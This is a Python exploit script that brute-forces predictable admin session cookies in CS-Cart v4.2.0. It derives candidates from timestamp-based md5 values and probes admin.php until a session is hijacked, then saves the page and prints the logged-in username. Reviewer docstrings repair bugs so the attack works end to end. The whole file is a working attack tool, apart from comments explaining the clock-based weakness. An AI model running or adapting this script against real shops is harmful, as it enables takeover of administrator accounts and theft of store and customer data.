CS-Cart Session Brute Force Exploit
#!/usr/bin/env python | |
# CS-Cart session brute force exploit for v4.2.0 | |
# see https://www.nikcub.com/posts/cs-cart-v4-2-0-session-hijacking-and-other-vulnerabilities/ | |
import sys | |
import requests | |
import argparse | |
import re | |
import string | |
import random | |
import hashlib | |
from BeautifulSoup import BeautifulSoup | |
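target_host = "cscart.dev"
target_ua = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:20.0) Gecko/20100101 Firefox/20.0"
# Unix timestamp (seconds) at which the victim's session was created: the
# moment the link was clicked plus the 3-4 seconds the login itself takes.
# The search walks forward from this second, one second at a time.
target_start_time = 1402325013
# change nothing below.
session_name = False   # session cookie name; computed from the base URL further down
session_value = False  # placeholder, not referenced anywhere in this listing
cookies = {}
headers = {
    "Host": target_host,
    "User-Agent": target_ua,
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate"
}
# Fixed: the original assigned the undefined names `proxy_none` and `host`
# here and raised NameError before any request was made. No proxy is used
# unless this is changed; `host` is simply the configured target.
proxies = None
host = target_host
# Plain HTTP: every probed cookie value, and the session on a hit, travel
# in the clear.
req_base = 'http://' + host
req_url = req_base + '/admin.php'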
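def extract_username(html_doc):
    """Return the signed-in user's display name from a CS-Cart admin page.

    Takes the first ``<a>`` inside the first ``<li>`` of the
    ``ul.dropdown-menu.pull-right`` menu and returns the text between its
    ``<br />`` and ``</a>``, stripped. Returns ``'Not Found'`` when the
    menu, the list item, the link or that text is absent.

    Fixed: the original dereferenced each ``.find()`` result (and the
    ``re.search`` match) without a ``None`` check, so a non-admin page raised
    ``AttributeError`` instead of returning ``'Not Found'``.
    """
    soup = BeautifulSoup(html_doc)
    menu = soup.find("ul", "dropdown-menu pull-right")
    if menu is None:
        return 'Not Found'
    item = menu.find("li")
    if item is None:
        return 'Not Found'
    link = item.find("a")
    if not link:
        return 'Not Found'
    match = re.search(r'<br />(.*?)</a>', str(link), re.DOTALL)
    if match is None:
        return 'Not Found'
    return match.group(1).strip()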
def rand_string(n=5):
    """Return ``n`` characters picked at random from A-Z and 0-9.

    Only used to make saved capture file names unique. ``random`` is not a
    CSPRNG, which is fine for a file-name suffix but not for anything secret.
    """
    alphabet = string.ascii_uppercase + string.digits
    picks = [random.choice(alphabet) for _ in range(n)]
    return ''.join(picks)
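def save_doc(tid, txt):
    """Write ``txt`` to ``<tid>_<5 random chars>.txt`` in the working directory.

    ``txt`` is reduced to ASCII (non-ASCII characters dropped) before it is
    written. The file is opened in binary mode, matching the encoded payload,
    and managed with ``with`` so the handle is released even if the write
    raises — the original leaked it on error and wrote bytes to a text-mode
    file. ``tid`` is supplied by the caller (host plus guessed cookie value
    in this listing) and is used verbatim in the file name.
    """
    path = tid + '_' + rand_string() + '.txt'
    with open(path, 'wb') as fh:
        fh.write(txt.encode('ascii', 'ignore'))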
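def req_att(path, cookie):
    """GET ``path`` on the target with the session cookie set to ``cookie``.

    Stores ``cookie`` under the computed session cookie name in the
    module-level ``cookies`` dict, sends the request without following
    redirects and returns the ``requests`` response. Not called anywhere in
    this listing.

    Fixed: the original updated ``cookies`` but never passed it to
    ``requests.get`` (so the request went out without the cookie), ignored
    the ``proxies`` setting and discarded the response.
    """
    cookies[session_name] = cookie
    return requests.get(req_base + path, headers=headers, cookies=cookies,
                        proxies=proxies, allow_redirects=False)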
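def calc_session_name(host):
    """Return the session cookie name for ``host``: the first 5 hex digits
    of ``md5(host)``.

    ``host`` may be text or bytes; text is UTF-8 encoded before hashing.
    Fixed: the original hashed the value as-is, which relies on the
    interpreter's implicit str/bytes handling and fails for non-ASCII text.
    """
    if not isinstance(host, bytes):
        host = host.encode('utf-8')
    return hashlib.md5(host).hexdigest()[:5]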
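def gen_value(basetime, usec):
    """Build one candidate session-cookie value for second ``basetime`` and
    sub-second counter ``usec``.

    The hashed text is the decimal timestamp, then the same timestamp as
    8 hex digits, then ``usec`` as 5 hex digits; the result is the md5 hex
    digest with ``_0_A`` appended. The ``%08x%05x`` part looks like a PHP
    ``uniqid()`` (seconds plus microseconds) following ``time()`` —
    presumably how the target derives its IDs; confirm against the linked
    write-up. Because every input is a clock value, the candidate space for
    a known second is at most ~10^6 values, which is what makes the brute
    force feasible; an ID drawn from a CSPRNG would not have this property.

    Fixed: the text is encoded explicitly (it is pure ASCII) instead of
    relying on implicit str/bytes conversion when hashing.
    """
    material = "%s%08x%05x" % (basetime, basetime, usec)
    return hashlib.md5(material.encode('ascii')).hexdigest() + "_0_A"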
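def req_generator(startat, usec_per_second=100000, progress_every=10000):
    """Yield candidate cookie values forever, starting at second ``startat``.

    For each second every ``usec`` from 0 to ``usec_per_second - 1`` is
    tried, then the second is advanced by one; the generator never ends.
    ``startat`` is a Unix timestamp in seconds. A ``.`` line is written and
    flushed every ``progress_every`` candidates so progress stays visible
    when stdout is a pipe.

    Fixed: the progress comment said 100000 while the code printed every
    10000 (the default keeps the original 10000), and the no-op
    ``startat = startat`` is gone. NOTE(review): the original caps ``usec``
    at 100000 per second, yet a microsecond field runs to 999999 and
    ``%05x`` fits that range — if the target really uses microseconds the
    default covers only a tenth of each second. Pass
    ``usec_per_second=1000000`` to cover it fully; the default is left at
    the original value pending confirmation.
    """
    usec = 0
    while True:
        candidate = gen_value(startat, usec)
        usec += 1
        if usec % progress_every == 0:
            sys.stdout.write('.\n')
            sys.stdout.flush()
        if usec >= usec_per_second:
            usec = 0
            startat += 1
        yield candidate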
# Session cookie name the target is expected to use: first 5 hex digits of
# md5(req_base). NOTE(review): this hashes the full base URL ("http://" +
# host) while the Host header carries the bare target_host — confirm which of
# the two the target derives its cookie name from.
session_name = calc_session_name(req_base)
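def fetch(cookie):
    """Probe admin.php with ``cookie`` as the session cookie value.

    Sends one GET (redirects not followed) with ``Cookie: <session_name>=<cookie>``
    via the module-level ``headers`` dict. A 302 is taken to mean "not logged
    in". Any other status is reported as a hit: the header names and body are
    saved with ``save_doc`` (the join iterates the header mapping, i.e. its
    keys) and the signed-in user name is printed. Returns the response on a
    hit, otherwise ``None``.

    Fixed: the original referenced undefined names (``cookie_name``,
    ``session_guess``, ``r``) and hid the resulting NameError behind
    ``except Exception: pass``, so it could never report a hit. Only
    ``requests`` errors (timeouts, connection failures) are still swallowed,
    as best-effort so the scan keeps going; anything else propagates.

    NOTE(review): with the ``!= 302`` heuristic a 5xx, 403 or 429 reply is
    also reported as FOUND — inspect the saved file before trusting a hit.
    """
    headers['Cookie'] = session_name + '=' + cookie
    try:
        response = requests.request('GET', req_url, headers=headers,
                                    proxies=proxies, timeout=30.0,
                                    allow_redirects=False)
    except requests.RequestException:
        # best-effort: a network error just skips this guess
        return None
    if response.status_code == 302:
        return None
    print("FOUND: " + session_name + "=" + cookie)
    save_doc(host + '_' + cookie, "\n".join(response.headers) + "\n" + response.text)
    print("Wrote file backup")
    print("Signed in as: " + extract_username(response.text))
    return response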
# Entry point: walk candidate cookie values forward from the configured
# start second and probe each one against admin.php. There is no upper
# bound on the search; the loop runs until the process is killed.
for guess in req_generator(target_start_time):
    fetch(guess)